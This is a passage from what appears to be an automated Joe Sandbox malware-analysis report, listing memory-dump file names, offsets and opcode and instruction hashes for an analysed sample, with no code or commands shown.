                                                                                • Source File: 00000005.00000002.1521207615.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                                                • Associated: 00000005.00000002.1521183556.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521207615.0000000000315000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521278975.0000000000327000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000329000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000596000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521723487.00000000005D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522234851.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522260423.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2d0000_file.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 47ca5cb287c6db2eefa5bdf2824516362d5914da0f0b885bfb7d6e35a9218596
                                                                                • Instruction ID: c7c4a9f41941b7d5f2dce80670476a4eb1050699e04934ac458b155b798b4bc9
                                                                                • Opcode Fuzzy Hash: 47ca5cb287c6db2eefa5bdf2824516362d5914da0f0b885bfb7d6e35a9218596
                                                                                • Instruction Fuzzy Hash: BEB01250B042087F10249D0A8C55EBBF7FED2CF740F10B009B408A3314C650EC0582FD